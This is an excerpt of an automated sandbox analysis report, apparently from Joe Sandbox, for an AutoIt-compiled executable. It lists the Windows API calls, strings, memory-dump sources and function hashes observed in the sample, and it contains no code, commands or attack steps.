                                                                                                                                                                • Instruction ID: 8b6b9497eefd5eab7504dfa904213ccb63a52fd0612198615ff3d9b93080247a
                                                                                                                                                                • Opcode Fuzzy Hash: 2ab58862b431f4fd46a084630cdfed6040caae9de0d59cbf344f1e40e369ff6a
                                                                                                                                                                • Instruction Fuzzy Hash: 48E09A352202259FC301AF59E800A9AB7ECAF997A0F01841AF989DB311DA70A9008B90
                                                                                                                                                                APIs
                                                                                                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00315205
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: mouse_event
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2434400541-0
                                                                                                                                                                • Opcode ID: cd5a9167eac027b069fd2ea303a03eefd0f6bed15c0da5ffe956a34aa1a1220a
                                                                                                                                                                • Instruction ID: 2462b505339be469364a5d2d70613da2234e58197e92973ec2719ba5bb95d279
                                                                                                                                                                • Opcode Fuzzy Hash: cd5a9167eac027b069fd2ea303a03eefd0f6bed15c0da5ffe956a34aa1a1220a
                                                                                                                                                                • Instruction Fuzzy Hash: FFD01794160A09B8EC1F03248A0FFB60208E3897C0F95416A7142C90C3AC9068C99821
                                                                                                                                                                APIs
                                                                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00308FA7), ref: 00309389
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LogonUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1244722697-0
                                                                                                                                                                • Opcode ID: 021d5bf569d5571da40697fb3f80ca45a1284a5eca6e8f271d643467ccb7c949
                                                                                                                                                                • Instruction ID: 72895476fd8aad1d0ea80be1db1856205586bc5713f38fad288e9bfd419393be
                                                                                                                                                                • Opcode Fuzzy Hash: 021d5bf569d5571da40697fb3f80ca45a1284a5eca6e8f271d643467ccb7c949
                                                                                                                                                                • Instruction Fuzzy Hash: 78D05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A0C775E835AB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 002F0734
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                                                • Opcode ID: 62d414e6dbcc775da39c0710e81ec0edd7bae2aaef9e9e485f30639659e81877
                                                                                                                                                                • Instruction ID: b586ef0f512bc193a64672462da735d01d55b7ab53be65fb043da4c17185fc79
                                                                                                                                                                • Opcode Fuzzy Hash: 62d414e6dbcc775da39c0710e81ec0edd7bae2aaef9e9e485f30639659e81877
                                                                                                                                                                • Instruction Fuzzy Hash: 0EC04CF582010DDBCB15DBA0D998EFEB7BCAB04344F100059A205B2100DB749B448A71
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002DA35A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                • Opcode ID: 444575337b463fcf5589e0ff69f66a6714e11ddbcf6d857e19d9ea60d4880596
                                                                                                                                                                • Instruction ID: 217c1f603c6de9f006298171420193e9656d740aebe5439b32986629fbb2941a
                                                                                                                                                                • Opcode Fuzzy Hash: 444575337b463fcf5589e0ff69f66a6714e11ddbcf6d857e19d9ea60d4880596
                                                                                                                                                                • Instruction Fuzzy Hash: 4FA0123402010CA78A011F41EC044447F5CD601650B004010F50C040218B3264104980
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00327F45
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00327F57
                                                                                                                                                                • DestroyWindow.USER32 ref: 00327F65
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00327F7F
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00327F86
                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003280C7
                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003280D7
                                                                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0032811F
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0032812B
                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00328165
                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00328187
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0032819A
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003281A5
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 003281AE
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003281BD
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 003281C6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003281CD
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 003281D8
                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003281EA
                                                                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00343C7C,00000000), ref: 00328200
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00328210
                                                                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00328236
                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00328255
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00328277
                                                                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00328464
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                                                                • Opcode ID: 01c59c88e3b81ff493cdcf7d3b4d8e49ea47f8aaf9458379f42ccd2d6efd8568
                                                                                                                                                                • Instruction ID: ec5f58fd68cdfd352b3ea469eabdb1bb61e000cd71280d64249856d17d70c41f
                                                                                                                                                                • Opcode Fuzzy Hash: 01c59c88e3b81ff493cdcf7d3b4d8e49ea47f8aaf9458379f42ccd2d6efd8568
                                                                                                                                                                • Instruction Fuzzy Hash: C7028B75A10115EFDB16DFA4DC89EAE7BB9FB49310F008558FA15AB2A1CB30AD41CF60
                                                                                                                                                                APIs
                                                                                                                                                                • CharUpperBuffW.USER32(?,?,00340980), ref: 00333C65
                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00333C89
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                • API String ID: 4105515805-45149045
                                                                                                                                                                • Opcode ID: 2bdfb7e8e91bb7371ffee86dc5849aaaa1362e63998d8f2362e6ee4a15f0d4bc
                                                                                                                                                                • Instruction ID: 550c86cb053d18ee5ea92deaa9d085e97392ad1958b26c3a1a91630323f9b99a
                                                                                                                                                                • Opcode Fuzzy Hash: 2bdfb7e8e91bb7371ffee86dc5849aaaa1362e63998d8f2362e6ee4a15f0d4bc
                                                                                                                                                                • Instruction Fuzzy Hash: C9D170342142058BCB06EF10C4D1BAAB7A6EF94354F118859F9865B7F3CB35EE5ACB42
                                                                                                                                                                APIs
                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0033AC55
                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0033AC86
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0033AC92
                                                                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0033ACAC
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0033ACBB
                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0033ACE6
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 0033ACEE
                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0033ACF5
                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0033AD04
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0033AD0B
                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0033AD56
                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 0033AD88
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0033ADB3
                                                                                                                                                                  • Part of subcall function 0033AF18: GetSysColor.USER32(00000012), ref: 0033AF51
                                                                                                                                                                  • Part of subcall function 0033AF18: SetTextColor.GDI32(?,?), ref: 0033AF55
                                                                                                                                                                  • Part of subcall function 0033AF18: GetSysColorBrush.USER32(0000000F), ref: 0033AF6B
                                                                                                                                                                  • Part of subcall function 0033AF18: GetSysColor.USER32(0000000F), ref: 0033AF76
                                                                                                                                                                  • Part of subcall function 0033AF18: GetSysColor.USER32(00000011), ref: 0033AF93
                                                                                                                                                                  • Part of subcall function 0033AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0033AFA1
                                                                                                                                                                  • Part of subcall function 0033AF18: SelectObject.GDI32(?,00000000), ref: 0033AFB2
                                                                                                                                                                  • Part of subcall function 0033AF18: SetBkColor.GDI32(?,00000000), ref: 0033AFBB
                                                                                                                                                                  • Part of subcall function 0033AF18: SelectObject.GDI32(?,?), ref: 0033AFC8
                                                                                                                                                                  • Part of subcall function 0033AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0033AFE7
                                                                                                                                                                  • Part of subcall function 0033AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0033AFFE
                                                                                                                                                                  • Part of subcall function 0033AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0033B013
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4124339563-0
                                                                                                                                                                • Opcode ID: 3df2d66bea10b2bc8e360fb5c2cd0716f711d2dd0aa6a84d1e5ce25e99dfc951
                                                                                                                                                                • Instruction ID: c59c8689dd0a86099fac08a436cd58916b54bb0cb96a1f4db40c817fff467db4
                                                                                                                                                                • Opcode Fuzzy Hash: 3df2d66bea10b2bc8e360fb5c2cd0716f711d2dd0aa6a84d1e5ce25e99dfc951
                                                                                                                                                                • Instruction Fuzzy Hash: C7A19175108701AFD7169F64DC48E6B7BADFF4A321F100A19FAA29A1E0DB31E844CF52
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(?,?,?), ref: 002B3072
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 002B30B8
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 002B30C3
                                                                                                                                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 002B30CE
                                                                                                                                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 002B30D9
                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 002EC77C
                                                                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002EC7B5
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002ECBDE
                                                                                                                                                                  • Part of subcall function 002B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B2412,?,00000000,?,?,?,?,002B1AA7,00000000,?), ref: 002B1F76
                                                                                                                                                                • SendMessageW.USER32(?,00001053), ref: 002ECC1B
                                                                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002ECC32
                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002ECC48
                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002ECC53
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 464785882-4108050209
                                                                                                                                                                • Opcode ID: 0f133181bd32b592e197473a19ee80933c42bfed39e19f68675352795c2474eb
                                                                                                                                                                • Instruction ID: 6ce8ff3693b69112e51dc06a65cc0d64300e0ba1e27cca371eeb1ce264db0225
                                                                                                                                                                • Opcode Fuzzy Hash: 0f133181bd32b592e197473a19ee80933c42bfed39e19f68675352795c2474eb
                                                                                                                                                                • Instruction Fuzzy Hash: F912D130664242EFCB25DF65C884BA5B7A5FF05300F644569F989CB262CB31EC66CF91
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00327BC8
                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00327C87
                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00327CC5
                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00327CD7
                                                                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00327D1D
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00327D29
                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00327D6D
                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00327D7C
                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00327D8C
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00327D90
                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00327DA0
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00327DA9
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00327DB2
                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00327DDE
                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00327DF5
                                                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00327E30
                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00327E44
                                                                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00327E55
                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00327E85
                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00327E90
                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00327E9B
                                                                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00327EA5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                                • Opcode ID: fd2b5c5d508496021cbf886078e617068268520f775a9154503e863175f786d5
                                                                                                                                                                • Instruction ID: 2b54e3f888e85e0956573a05a0e75bb3f8a62ac9c429f4f713b39da52bdbe922
                                                                                                                                                                • Opcode Fuzzy Hash: fd2b5c5d508496021cbf886078e617068268520f775a9154503e863175f786d5
                                                                                                                                                                • Instruction Fuzzy Hash: 64A160B5A10215BFEB15DBA4DC4AFAA7BADEB05710F004514FA15AB2E1CB70AD50CF60
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0031B361
                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,00342C4C,?,\\.\,00340980), ref: 0031B43E
                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00342C4C,?,\\.\,00340980), ref: 0031B59C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                                                                • Opcode ID: 7006cab080661749f7c5a54fc9c98021158831b297f9ce662d03eae60da2049c
                                                                                                                                                                • Instruction ID: 59faa062cb4a28a66b6ff26637a7f7a430bb4a7fea10728d35fe6d24b085e2dd
                                                                                                                                                                • Opcode Fuzzy Hash: 7006cab080661749f7c5a54fc9c98021158831b297f9ce662d03eae60da2049c
                                                                                                                                                                • Instruction Fuzzy Hash: 4D51A634B40209EBC70ADB20C982AFDF7A6AF4E340B64C515E406E7691DB71AED1DF51
                                                                                                                                                                APIs
                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0033A0F7
                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0033A1B0
                                                                                                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0033A1CC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 2326795674-4108050209
                                                                                                                                                                • Opcode ID: e92b84087796c4b3cf677d1dd120e0c57ea49a311cc79c959b279df2b2167324
                                                                                                                                                                • Instruction ID: b5c7240b319c9255d19af59651a5014d2238a85f1a8d159f27eb44b98845c4f8
                                                                                                                                                                • Opcode Fuzzy Hash: e92b84087796c4b3cf677d1dd120e0c57ea49a311cc79c959b279df2b2167324
                                                                                                                                                                • Instruction Fuzzy Hash: 5F02D230208B01AFE71ACF14C889BAABBE8FF86314F05851DF9D9962A1C775D954CF52
                                                                                                                                                                APIs
